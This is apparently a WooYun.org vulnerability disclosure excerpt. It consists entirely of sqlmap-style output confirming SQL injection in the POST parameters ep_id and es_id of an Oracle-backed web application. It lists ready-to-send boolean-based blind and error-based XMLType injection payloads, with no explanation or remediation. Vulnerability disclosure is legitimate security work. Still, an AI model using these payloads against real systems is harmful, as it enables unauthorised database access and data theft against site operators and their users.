WooYun.org

Place: POST
Parameter: ep_id
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: action=info&ep_id=1437' AND 4826=(SELECT UPPER(XMLType(CHR(60)||CHR
(58)||CHR(120)||CHR(105)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (4826=4826) THEN
 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(117)||CHR(117)||CHR(58)||CHR(6
2))) FROM DUAL) AND 'cxvK'='cxvK&es_id=25454
Place: POST
Parameter: es_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=info&ep_id=1437&es_id=25454' AND 5196=5196 AND 'ARgU'='ARgU
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: action=info&ep_id=1437&es_id=25454' AND 6147=(SELECT UPPER(XMLType(
CHR(60)||CHR(58)||CHR(120)||CHR(105)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (614
7=6147) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(117)||CHR(117)||CH
R(58)||CHR(62))) FROM DUAL) AND 'ZPVW'='ZPVW
---